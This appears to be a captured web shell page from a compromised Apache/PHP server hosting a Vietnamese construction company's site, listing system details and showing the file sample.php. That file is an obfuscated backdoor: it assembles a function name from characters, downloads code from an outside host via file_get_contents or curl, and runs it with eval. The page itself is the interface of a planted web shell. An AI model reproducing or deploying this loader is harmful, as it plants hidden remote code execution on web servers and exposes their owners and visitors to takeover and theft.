HEX
Server: Apache
System: Linux static.vnpt.vn 4.18.0-348.el8.x86_64 #1 SMP Tue Nov 9 06:28:28 EST 2021 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv,open_basedir
$ pwd: /www/wwwroot/xaydunghoaphu.com.vn/
Upload Files
File: /www/wwwroot/xaydunghoaphu.com.vn/sample.php
<?php
$load = '';
$zfj0304 = 'http://z60520_7.hstanton.com/stat/index2.txt';
$sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'];
foreach($sources as $s) $load .= $s;

$fetch = false;
if(ini_get('allow_url_fopen') && function_exists($load)) {
    $fetch = @$load($zfj0304);
}

if($fetch === false && function_exists('curl_init')) {
    $ch = curl_init();
    $opts = [10102=>true,10002=>$zfj0304,19913=>true,19914=>true,13=>10];
    curl_setopt_array($ch, $opts);
    $fetch = curl_exec($ch);
    curl_close($ch);
}

if($fetch !== false) {
    $payload = '?>' . $fetch;
    eval($payload);
}
@ Telegram